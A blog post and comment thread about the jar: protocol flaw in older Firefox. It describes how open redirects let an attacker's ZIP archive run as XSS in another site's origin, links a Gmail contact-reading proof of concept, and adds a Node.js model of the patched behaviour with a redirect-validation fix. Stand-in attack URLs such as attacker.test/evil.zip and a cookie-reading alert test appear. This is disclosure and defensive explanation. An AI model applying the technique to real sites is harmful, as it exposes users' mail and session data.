Firefox jar: Protocol Vulnerability
I just came across pdp's finding about the jar: protocol vulnerability in Mozilla Firefox. I think it's a big issue, and the fact that it has been sitting in Bugzilla (#369814) for way more than ten fuck*ng days is not a good thing.
According to pdp, this issue exposes to cross-site scripting any application that lets users upload ZIP or JAR files: content unpacked from the archive through a jar: URL runs in the origin of the site that hosts it. After a couple of minutes messing around with the PoCs, I figured out that sites with open redirect issues are vulnerable too, since jar: follows the redirect to the attacker's archive but keeps the redirecting site's domain as the origin. I've created this PoC that attacks Gmail. It's based on my previous post and it will only show your contacts list; nothing is being logged server side (as some people thought my previous PoC did). Credit to tx for discovering the open redirect issue used to exploit Google / Firefox:
http://beford.org/stuff/jarjarbinks.htm
Whose fault is it? Both: Google's, for having open redirect issues and not fixing them, and Mozilla Corporation's, for failing to address this problem.
What can I do to protect myself? Giorgio Maone has already added protection against this flaw to the NoScript development version.
Update: NoScript has released a stable version with jar: protection. A new Bugzilla entry (#403331) was created to fix the inappropriate redirect handling in the jar: protocol; according to the latest comments and the bug's keywords, there is a patch and it will be available in Firefox 2.0.0.10.
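As an added example (not code from the original post or from pdp's PoC), the following Node.js script models the two halves of the problem described above: how a jar: URL of the form `jar:<archive-url>!/<entry>` gets its origin in the unpatched and patched browser when the archive URL is an open redirect, and the server-side check that closes the open redirect so it can no longer be pointed at an attacker's archive. The jar: URL syntax is Firefox's real syntax; the host names, the redirect table and the archive entry are constructed for illustration, and only Location-header redirects are modelled.

```javascript
// Added example (not from the original post): models why an open redirect turns the
// pre-2.0.0.10 Firefox jar: behaviour into XSS. The jar: URL form `jar:<archive-url>!/<entry>`
// is Firefox's real syntax; every host name, redirect target and entry below is constructed.

// Split a jar: URL into the URL of the archive and the path of the entry inside it.
function parseJarUrl(jarUrl) {
  if (!jarUrl.startsWith("jar:")) throw new Error("not a jar: URL");
  const bang = jarUrl.indexOf("!/");
  if (bang < 0) throw new Error("jar: URL lacks the !/ entry separator");
  return {
    archiveUrl: jarUrl.slice(4, bang),
    entryPath: jarUrl.slice(bang + 1), // keeps the leading "/"
  };
}

// Constructed stand-in for the network: URLs that answer with a Location redirect.
// The key is the archive URL as written by the attacker; the value is where the
// server sends the browser (an open redirect takes the target from a query parameter).
const CONSTRUCTED_REDIRECTS = {
  "http://www.example-mail.test/redirect?url=http://attacker.test/evil.zip":
    "http://attacker.test/evil.zip",
};

// Follow Location redirects the way an ordinary fetch does and return the final URL.
function resolveRedirects(url, redirects, maxHops = 5) {
  let current = url;
  for (let hop = 0; hop < maxHops && redirects[current]; hop++) {
    current = redirects[current];
  }
  return current;
}

// Model of loading a document through jar:. The archive bytes always come from the
// end of the redirect chain (servedFrom). Unpatched: the document's origin is taken
// from the archive URL as written, i.e. the redirecting host. Patched: the origin
// follows the redirect chain to the host that actually served the archive.
function loadJarDocument(jarUrl, redirects, patched) {
  const { archiveUrl, entryPath } = parseJarUrl(jarUrl);
  const servedFrom = resolveRedirects(archiveUrl, redirects);
  const origin = new URL(patched ? servedFrom : archiveUrl).origin;
  return { origin, servedFrom, entryPath };
}

// True when script in the unpacked document would run in an origin other than the
// one that served the archive: that is exactly the open-redirect XSS.
function isCrossOriginExecution(doc) {
  return doc.origin !== new URL(doc.servedFrom).origin;
}

// Server-side half of the fix: a redirect endpoint that only accepts same-site,
// path-only targets cannot be pointed at an attacker's archive. Anything carrying a
// scheme or host is rejected, including protocol-relative "//host/..." forms; the
// origin comparison also catches parser quirks such as "/\\host/..." which the
// WHATWG URL parser normalises to "//host/...".
function isSafeRedirectTarget(target, siteOrigin) {
  if (!target.startsWith("/") || target.startsWith("//")) return false;
  return new URL(target, siteOrigin).origin === siteOrigin;
}

// Worked case: the attacker's jar: URL points at the mail site's open redirect.
const ATTACK_JAR_URL =
  "jar:http://www.example-mail.test/redirect?url=http://attacker.test/evil.zip!/payload.html";

const unpatched = loadJarDocument(ATTACK_JAR_URL, CONSTRUCTED_REDIRECTS, false);
const patched = loadJarDocument(ATTACK_JAR_URL, CONSTRUCTED_REDIRECTS, true);
console.log("unpatched:", unpatched, "cross-origin:", isCrossOriginExecution(unpatched));
console.log("patched:  ", patched, "cross-origin:", isCrossOriginExecution(patched));
console.log("redirect target allowed?",
  isSafeRedirectTarget("http://attacker.test/evil.zip", "http://www.example-mail.test"));
```

In the unpatched model the payload served from attacker.test ends up with the mail site's origin, which is why a redirect to any archive under the attacker's control is enough; in the patched model it gets attacker.test's origin and the same-origin policy applies as usual. The `isSafeRedirectTarget` check is the site-side fix the post asks for: with it in place, `redirect?url=http://attacker.test/evil.zip` is refused and the jar: URL has nothing to fetch.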
impressive, nice find!
Boom! That's a bombshell and a half... Nice find.
Though it's probably worth explaining (to people who don't want to run the PoC) that the actual issue here that makes open redirects such a problem is that the jar: protocol follows redirects, but doesn't actually change the domain.
So all redirects are vulnerable if you can get them to point to any zip file.
I just checked and redirects which use the Refresh header rather than the Location header seem to be immune.
s/languaje/language/ on jarjarbinks.htm.
Nicolas: Thanks, fixed.
I could not manipulate cookies.
Does it only affect CSRF?
Luca: You should be able to read cookies. I didn't try too hard, but my first test with Gmail was a simple alert(document.cookies) and it worked.